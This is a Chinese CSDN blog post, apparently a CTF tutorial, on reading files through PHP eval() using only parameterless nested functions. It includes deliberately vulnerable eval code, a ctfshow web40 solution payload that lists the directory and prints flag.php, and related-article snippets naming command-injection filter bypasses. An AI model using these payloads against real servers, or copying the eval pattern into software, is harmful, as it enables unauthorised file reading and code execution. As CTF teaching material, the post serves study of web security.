无参数文件读取

最新推荐文章于 2023-07-18 01:01:11 发布
最新推荐文章于 2023-07-18 01:01:11 发布
阅读量267 收藏 2
点赞数 1
分类专栏: Web安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/120297852
版权

无参数文件读取

什么是无参数?

顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;使用的函数规定必须参数为空或者为一个参数等。

举个例子:

a(b(c()));可以使用,但是a(‘b’)或者a(‘b’,‘c’)这种含有参数的都不能使用

所以我们要使用无参数的函数进行文件读取或者命令执行。

首先,print_r(scandir(’.’))可以用于可以用来查看当前目录所有文件名。那么要做到无参数,就要构造替代 ‘.’ 。

常见方法:

  • localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是"."

  • current() 函数返回数组中的当前元素(单元),默认取第一个值,

  • pos() 同 current() ,是current()的别名

  • reset() 函数返回数组第一个单元的值,如果数组为空则返回 FALSE

  • phpversion()返回PHP版本,如5.5.9

  • next() 函数将内部指针指向数组中的下一个元素,并输出。

  • show_source() 函数对文件进行 PHP 语法高亮显示。语法通过使用 HTML 标签进行高亮。

<?php
highlight_file(__FILE__);
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}
?>

这里使用preg_replace替换匹配到的字符为空,\w匹配字母、数字和下划线,等价于 [^A-Za-z0-9_],然后(?R)?这个意思为递归整个匹配模式

所以正则的含义就是匹配无参数的函数,内部可以无限嵌套相同的模式(无参数函数),将匹配的替换为空。

所以 print_r(scandir(current(localeconv())));就可以成功打印出当前目录下文件。

例:ctfshow web40

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

解:
1 ?c=print_r(scandir(pos(localeconv())));   发现flag.php在倒数第二个
2 ?c=show_source(next(array_reverse(scandir(pos(localeconv())))));  
我们可以通过 array_reverse 进行逆转数组,然后用next()函数进行下一个值的读取,成功读取flag.php文件

参考:

Snakin_ya
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
参数文件和RCE
..
01-08 626
题目背景:长安战疫杯的RCE_No_Para 代码解析: preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) preg_replace是执行正则搜索,如果搜索到则替换为空。 \W是匹配非数字、字母、下划线,[^\W]则是非\W的东西,即数字、字母、下划线,相当于小写的\w。 正则表达式 – 元字符 | 菜鸟教程 然后难点是(?R)?,意思为递归整个匹配模式。 举个例子: a() #递归零次 a...
命令执行无参数函数文件读取
weixin_53498616的博客
03-21 178
apache环境下,getallheaders()函数可以返回http header。如果在http header中添加自定义代码,再将其取出即可执行。 如果目标中间件不为apache,可以使用get_defined_vars()函数,它可以返回全局变量。
参数文件和RCE总结
kuzemax的博客
07-18 884
什么是无参数?顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;
php递归匹配以及无参数文件读取
Sacrifice_li的博客
10-05 287
1. php正则匹配-递归匹配 例如: preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) 其中[^\W]+ 表示任意的字符和数字以及下划线,匹配1次或者多次 然后是匹配 "(" 一次 然后是(?R)? 表示递归匹配 也就是表示当前的正则匹配pattern这整个式子,(?R)代表的是整个式子,而最后一个?表示的是给予这个递归一个终止信号,因为?可以表示0次或者1次,所以同样可以用*来代替。当然这里?以及*可能出现递归栈的不同。 综上所述:该正则可以匹
Java初学—对比有参数和无参数
贝贝小菜鸟的博客
06-01 314
参数:小括号当中有内容,当一个方法需要一些数据条件,才能完成任务的时候,就是有参数。 无参数:小括号当中留白,一个方法不需要任何数据条件,直接就能完成任务,就是无参数。 代码练习: public class Demo03MethodParam { public static void main(String[] args){ method1(10,20); method2(); } public static void method1(int a,
SpringBoot如何读取配置文件参数并全局使用
08-25
SpringBoot如何读取配置文件参数并全局使用 SpringBoot 框架中读取配置文件参数并全局使用是非常重要的,特别是在实际开发中,我们经常需要读取配置文件中的参数来实现灵活的配置管理。本文将主要介绍如何在 ...
读取xml文件中的配置参数实例
08-29
读取XML文件中的配置参数实例 读取XML文件中的配置参数实例是一种常见的应用场景,在实际开发中,我们经常需要读取XML文件中的配置参数来完成特定的任务。下面,我们将详细介绍读取XML文件中的配置参数实例。 首先...
多线程样例一 读写参数文件
09-09
启动线程“读取参数”线程:执行100次 读取参数功能。 启动线程“模拟图像处理”线程:执行100次 模拟图像处理。 运行预期结果: File文件夹中有0到100共101个文件。 img有约80个文件。 img有的文件,File文件夹中...
带密码INI文件读写_ini文件_especiallyvsy_加密_读写ini文件_文件读取_
09-29
文件读取”标签则进一步说明了整个过程涉及到文件读取操作,这通常包括定位文件、打开文件读取数据、关闭文件等步骤。在加密ini文件的上下文中,这意味着在读取文件时需要先解密数据,然后才能将其转换成程序...
采用无缓冲方式实现文件读写.docx
11-27
"采用无缓冲方式实现文件读写" 本文档是武汉大学计算机学院《Windows原理与应用》课程实验报告,旨在介绍如何使用无缓冲方式实现文件读写。该实验报告的主要内容包括实验目的、实验设计、实验原理和实验步骤等方面...
Web1 命令执行(三)
weixin_53896576的博客
02-07 482
7. 无参 RCE 构造 https://blog.csdn.net/qi_SJQ_/article/details/119457821 算是一种特殊的绕过方式,套娃形式,数学函数的理解,不过未限制长度。 chr():根据ascii码值将数字转换成字符串 get_defined_vars() 获取题目相关变量 print_r() 函数用于打印变量,以更容易理解的形式展示 localeconv():是一个编程语言函数,返回包含本地数字及货币信息格式的数组。其中数组中 的第一个为点号(.) pos():
PHP正则表达式
weixin_51313108的博客
08-30 277
正则表达式何为正则表达式基本语法元字符与转义贪婪+和非贪婪?(?R)和(?R)?preg_match函数 何为正则表达式 正则表达式是对字符串进行操作的一种逻辑公式,就是用一些特定的字符组合成一个规则字符串,称之为正则匹配模式。 基本语法 PCRE库函数中,正则匹配模式使用分隔符与元字符组成,分隔符可以是非数字、非反斜线、非空格的任意字符。 经常使用的分隔符是正斜线(/)、hash符号(#) 以及取反符号(~),例如:/foo bar/ #^[^0-9]$# ~php~ 如果模式中包含分隔符,则分隔
php参数函数实现rce,无参数文件和RCE总结
weixin_28759987的博客
04-02 768
chr(time)chr(current(localtime(time)))chr(time) :chr 函数以256为一个周期,所以 chr(46) , chr(302) , chr(558) 都等于 "."所以使用 chr(time) ,一个周期必定出现一次 "."chr(current(localtime(time))) :数组第一个值每秒+1,所以最多60秒就一定能得到46,用 curre...
参数函数RCE
weixin_53146913的博客
07-19 1946
1.利用超全局变量进行bypass,进行RCE 2.进行任意文件读取
php参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 1917
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
php scandir函数,print_r函数的问题
GQ_cyan的博客
06-24 972
一,scandir函数问题 scandir()输出结果有"."   ".."的问题,可以用array_diff()消除: $a=scandir("d:/"); $b=array_diff($a);即可取出点号 二print_r函数问题 print_r函数内容换行在调用此函数前面加上echo "";即可得到格式相同且分行的内容。
Cosmos开发指南(一)
weixin_30399871的博客
10-29 350
从这篇博文开始,我将针对基于Cosmos框架的开发进行详细的介绍,那么第一个例子就将着重来说明如何在Cosmos框架的基础上进行项目的开发和部署。 在进行例子的讲解之前,自然是要部署相应的开发环境、测试环境,为了尽快地了解Cosmos框架的全貌,我们将基于Cosmos自带的Example程序进行开发,这个Example程序已经将开发环境和测试环境设置完全了,同时,由于这个Example...
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3314
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
kettle 读取配置文件参数
最新发布
10-13
在kettle的作业或转换中的其他步骤中,我们就可以使用这些通过配置文件读取参数了。例如,在一个数据库连接步骤中,我们可以使用"${db.host}"来引用配置文件中定义的数据库主机参数。 通过以上步骤,我们可以实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值